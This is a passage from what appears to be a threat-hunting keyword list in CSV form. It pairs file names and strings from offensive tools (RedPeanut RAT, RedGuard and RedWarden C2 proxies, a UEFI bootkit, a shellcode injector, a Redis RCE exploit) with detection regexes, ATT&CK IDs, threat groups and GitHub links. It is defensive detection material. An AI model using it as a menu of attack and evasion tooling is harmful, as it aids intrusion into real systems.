"*recon-archy crawl*",".{0,1000}recon\-archy\scrawl.{0,1000}","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","N/A","7","1","17","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z","56536"
"*recon-archy-master*",".{0,1000}recon\-archy\-master.{0,1000}","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","N/A","7","1","17","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z","56537"
"*ReconUserGroupRoles.ps1*",".{0,1000}ReconUserGroupRoles\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","56538"
"*RecycledInjector.exe*",".{0,1000}RecycledInjector\.exe.{0,1000}","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","N/A","3","266","43","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z","56539"
"*RecycledInjector-main*",".{0,1000}RecycledInjector\-main.{0,1000}","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","N/A","3","266","43","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z","56540"
"*RecycledInjector-main*",".{0,1000}RecycledInjector\-main.{0,1000}","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","N/A","3","266","43","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z","56541"
"*RED_HAWK*",".{0,1000}RED_HAWK.{0,1000}","offensive_tool_keyword","red_hawk","Vulnerability Scanning and Crawling. A must have tool for all penetration testers.","T1190 - T1059 - T1595","TA0001 - TA0009","N/A","N/A","Reconnaissance","https://github.com/Tuhinshubhra/RED_HAWK","1","0","N/A","N/A","N/A","10","3257","888","2024-07-31T15:33:36Z","2017-06-11T05:02:35Z","56542"
"*Red-Baron*",".{0,1000}Red\-Baron.{0,1000}","offensive_tool_keyword","Red-Baron","Red Baron is a set of modules and custom/third-party providers for Terraform which tries to automate creating resilient. disposable. secure and agile infrastructure for Red Teams.","T1583 - T1078 - T1027 - T1135","TA0002 - TA0003 - TA0040","N/A","N/A","Framework","https://github.com/byt3bl33d3r/Red-Baron","1","0","N/A","N/A","N/A","4","378","77","2020-03-05T07:19:43Z","2018-08-23T18:25:07Z","56543"
"*RedByte1337/GraphSpy*",".{0,1000}RedByte1337\/GraphSpy.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1078.004 - T1110.003 - T1071.001 - T1566.002 - T1656","TA0001 - TA0006 - TA0003 - TA0005 - TA0008","N/A","N/A","Collection","https://github.com/RedByte1337/GraphSpy","1","1","N/A","N/A","10","7","680","72","2025-04-15T21:07:15Z","2024-02-07T19:47:15Z","56544"
"*redelk_backend_name_c2*",".{0,1000}redelk_backend_name_c2.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","56545"
"*redelk_backend_name_decoy*",".{0,1000}redelk_backend_name_decoy.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","56546"
"*RedGuard.log*",".{0,1000}RedGuard\.log.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","#logfile","N/A","10","10","1466","204","2024-08-20T17:43:35Z","2022-05-08T04:02:33Z","56547"
"*RedGuard/core*",".{0,1000}RedGuard\/core.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","0","N/A","N/A","10","10","1466","204","2024-08-20T17:43:35Z","2022-05-08T04:02:33Z","56548"
"*RedGuard_x64.exe*",".{0,1000}RedGuard_x64\.exe.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","N/A","10","10","1466","204","2024-08-20T17:43:35Z","2022-05-08T04:02:33Z","56549"
"*RedGuard_x86.exe*",".{0,1000}RedGuard_x86\.exe.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","N/A","10","10","1466","204","2024-08-20T17:43:35Z","2022-05-08T04:02:33Z","56550"
"*redhuntlabs/BucketLoot*",".{0,1000}redhuntlabs\/BucketLoot.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","N/A","7","5","409","58","2025-01-22T10:48:27Z","2023-07-17T09:06:14Z","56551"
"*RedHunt-OS*",".{0,1000}RedHunt\-OS.{0,1000}","offensive_tool_keyword","RedHunt-OS","Virtual Machine for Adversary Emulation and Threat Hunting by RedHunt Labs RedHunt OS aims to be a one stop shop for all your threat emulation and threat hunting needs by integrating attackers arsenal as well as defenders toolkit to actively identify the threats in your environment","T1583 - T1057 - T1016","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tool","https://github.com/redhuntlabs/RedHunt-OS","1","1","N/A","N/A","N/A","10","1268","199","2025-01-22T10:50:09Z","2018-03-14T19:31:16Z","56552"
"*Redirect LoadLibraryA to LdrLoadDll with spoofed ret addr !*",".{0,1000}Redirect\sLoadLibraryA\sto\sLdrLoadDll\swith\sspoofed\sret\saddr\s!.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","0","N/A","N/A","10","","N/A","","","","56553"
"*redirecttosmb.py *",".{0,1000}redirecttosmb\.py\s.{0,1000}","offensive_tool_keyword","SMBTrap","tool capturing authentication attempts and performing man-in-the-middle (MitM) attacks leveraging SMB services","T1071.001 - T1557.001 - T1040 - T1070.001 - T1205.001 - T1185","TA0006 - TA0008 - TA0011 - TA0005","N/A","ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/cylance/SMBTrap","1","0","N/A","N/A","8","1","84","38","2015-06-02T17:22:48Z","2015-04-13T07:08:01Z","56554"
"*redis-rce*",".{0,1000}redis\-rce.{0,1000}","offensive_tool_keyword","redis-rce","A exploit for Redis 4.x/5.x RCE. inspired by Redis post-exploitation.","T1210 - T1211 - T1021 - T1059","TA0002 - TA0011 - TA0003","N/A","N/A","Exploitation tool","https://github.com/Ridter/redis-rce","1","0","N/A","N/A","N/A","10","954","222","2021-11-30T14:55:59Z","2019-07-08T14:05:30Z","56555"
"*redlotus.efi*",".{0,1000}redlotus\.efi.{0,1000}","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","N/A","6","528","67","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z","56556"
"*RedPeanut Smb server started*",".{0,1000}RedPeanut\sSmb\sserver\sstarted.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56557"
"*RedPeanut.Models*",".{0,1000}RedPeanut\.Models.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56558"
"*redpeanut.pfx*",".{0,1000}redpeanut\.pfx.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56559"
"*RedPeanut.Resources.*.txt",".{0,1000}RedPeanut\.Resources\..{0,1000}\.txt","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56560"
"*RedPeanut.Utility*",".{0,1000}RedPeanut\.Utility.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56561"
"*RedPeanutAgent.C2*",".{0,1000}RedPeanutAgent\.C2.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56562"
"*RedPeanutAgent.Core*",".{0,1000}RedPeanutAgent\.Core.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56563"
"*RedPeanutAgent.cs*",".{0,1000}RedPeanutAgent\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56564"
"*RedPeanutAgent.Evasion*",".{0,1000}RedPeanutAgent\.Evasion.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56565"
"*RedPeanutAgent.Execution*",".{0,1000}RedPeanutAgent\.Execution.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56566"
"*RedPeanutAgent.Program*",".{0,1000}RedPeanutAgent\.Program.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56567"
"*RedPeanutC2*",".{0,1000}RedPeanutC2.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56568"
"*RedPeanutCLI*",".{0,1000}RedPeanutCLI.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56569"
"*RedPeanutDBContext*",".{0,1000}RedPeanutDBContext.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56570"
"*RedPeanutDBInitializer*",".{0,1000}RedPeanutDBInitializer.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56571"
"*RedPeanutHtaPowerShellScript*",".{0,1000}RedPeanutHtaPowerShellScript.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56572"
"*RedPeanutHtaScript.hta*",".{0,1000}RedPeanutHtaScript\.hta.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56573"
"*RedPeanutInstallUtil.cs*",".{0,1000}RedPeanutInstallUtil\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56574"
"*RedPeanutManager.cs*",".{0,1000}RedPeanutManager\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56575"
"*RedPeanutMigrate.cs*",".{0,1000}RedPeanutMigrate\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56576"
"*RedPeanutMSBuildScript.xml*",".{0,1000}RedPeanutMSBuildScript\.xml.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56577"
"*RedPeanutPowershellScriptS*",".{0,1000}RedPeanutPowershellScriptS.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56578"
"*RedPeanutRP.cs*",".{0,1000}RedPeanutRP\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56579"
"*RedPeanutShooter.*",".{0,1000}RedPeanutShooter\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56580"
"*RedPeanutSpawn.cs*",".{0,1000}RedPeanutSpawn\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","56581"
